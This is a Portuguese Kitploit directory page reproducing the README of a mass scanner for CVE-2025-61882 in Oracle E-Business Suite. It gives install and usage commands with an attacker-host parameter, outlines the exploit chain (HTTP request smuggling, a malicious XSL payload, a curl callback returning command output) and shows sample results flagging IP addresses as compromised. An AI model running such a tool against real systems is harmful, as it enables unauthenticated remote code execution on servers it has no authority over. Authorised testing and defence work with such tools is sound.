Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-61882 — Scanner multithread para CVE-2025-61882 no Oracle E-Business Suite, explorando contrabando de requisições HTTP para alcançar execução remota de código não autenticada e validar por meio da saída de comandos. | Kitploit
Ferramentas/GitHubGitHub/sachinart/cve-2025-61882
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubsachinart/cve-2025-61882

CVE-2025-61882

Scanner multithread para CVE-2025-61882 no Oracle E-Business Suite, explorando contrabando de requisições HTTP para alcançar execução remota de código não autenticada e validar por meio da saída de comandos.

Ver Repositório
1173há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Scanner RCE para Oracle E-Business Suite (CVE-2025-61882)

Um scanner em massa rápido e multithread para detectar a CVE-2025-61882 em instalações do Oracle E-Business Suite. Esta vulnerabilidade crítica permite execução remota de código não autenticada.

Python Version License CVE

🎯 Recursos

  • Varredura em Massa - Processa centenas ou milhares de alvos a partir de um arquivo
  • Multithread - Varredura concorrente configurável (padrão: 20 threads)
  • Detecção Automática - Valida RCE executando o comando id e analisando a saída
  • Resultados em Tempo Real - Alvos vulneráveis são gravados em vuln-output.txt imediatamente
  • Portas Aleatórias - Usa portas aleatórias (2000-9999) para cada alvo, evitando conflitos
  • Saída Limpa - Acompanhamento de progresso com ruído mínimo

📋 Requisitos

root@kitploit:~
pip install requests

Só isso. Basta Python 3.7+ e a biblioteca requests.

🚀 Instalação

root@kitploit:~
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt

💻 Uso

Varredura Básica

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost SEU_IP_VPS

Varredura Rápida (50 threads)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost SEU_IP_VPS --threads 50

Varredura Conservadora (10 threads)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost SEU_IP_VPS --threads 10

📝 Formato do Arquivo de Alvos

Crie um arquivo targets.txt com uma URL por linha:

root@kitploit:~
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com

📊 Exemplo de Saída

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║   Oracle E-Business Suite RCE Scanner (CVE-2025-61882)       ║
╚═══════════════════════════════════════════════════════════════╝

[*] Carregados 1235 alvos do arquivo
[*] Executando com 20 threads concorrentes
[*] Hosts vulneráveis serão salvos em vuln-output.txt

[*] [1/1235] Verificando https://target1.com:443 na porta 7893
[*] [2/1235] Verificando https://target2.com:443 na porta 5882

[+] Encontrado! 129.146.56.43 está vulnerável
[+] Saída do comando: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)

=================================================================
[*] Varredura concluída em 245.67 segundos
[*] Encontrados 3 alvo(s) vulnerável(is)
[*] Verifique vuln-output.txt para resultados completos
=================================================================

[+] Alvos vulneráveis encontrados:

    129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
    192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
    10.0.0.100 → uid=500(oracle) gid=500(oinstall)

📄 Arquivo de Saída

Os resultados são salvos em vuln-output.txt:

root@kitploit:~
# Oracle EBS CVE-2025-61882 - Resultados da Varredura
# Iniciado: Ter Out 07 15:30:45 2025
# Total de alvos: 1235
# Scanner por: Chirag Artani

129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)

🔍 Como Funciona

  1. Obtenção do Token CSRF - Busca um token CSRF válido do alvo
  2. Contrabando de Requisição HTTP - Explora a vulnerabilidade de contrabando para injetar payload malicioso
  3. Entrega do Payload XSL - Serve uma folha de estilo XSL maliciosa que executa comandos
  4. Validação por Callback - O alvo executa o comando id e envia a saída de volta via curl
  5. Correspondência por Regex - Valida RCE bem-sucedido verificando o padrão uid=...gid=...

⚙️ Configuração

🔒 Divulgação Responsável

Esta ferramenta é apenas para testes de segurança autorizados. Sempre:

  • ✅ Obtenha permissão por escrito antes de testar
  • ✅ Apenas escaneie sistemas que você possui ou para os quais tem autorização explícita de teste
  • ✅ Reporte descobertas de forma responsável às organizações afetadas
  • ✅ Siga práticas coordenadas de divulgação de vulnerabilidades
  • ❌ Nunca use em sistemas não autorizados

Acesso não autorizado a sistemas de computador é ilegal.

🐛 Problemas Conhecidos

  • Alguns alvos podem expirar devido a bloqueio por firewall/IDS
  • A detecção por callback exige que o alvo alcance seu VPS em portas aleatórias
  • Avisos de certificado SSL são suprimidos (esperado para pentest)

🤝 Contribuindo

Encontrou um bug? Tem uma solicitação de recurso?

  1. Faça um fork do repositório
  2. Crie sua branch de recurso (git checkout -b feature/amazing-feature)
  3. Faça commit das suas alterações (git commit -m 'Add some feature')
  4. Envie para a branch (git push origin feature/amazing-feature)
  5. Abra um Pull Request

📜 Licença

Este projeto é licenciado sob a Licença MIT - consulte o arquivo LICENSE para detalhes.

⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta. Use por sua conta e risco.

📚 Referências

  • Detalhes da CVE-2025-61882
  • Atualização Crítica de Patch da Oracle

👨‍💻 Desenvolvido por Chirag Artani

Website • Twitter • LinkedIn

Feito com ❤️ para a comunidade de infosec

Baixar ferramenta
ArgumentoObrigatórioPadrãoDescrição
--targetsSim-Caminho para o arquivo contendo URLs de alvos
--lhostSim-Seu endereço IP de VPS/atacante
--threadsNão20Número de threads concorrentes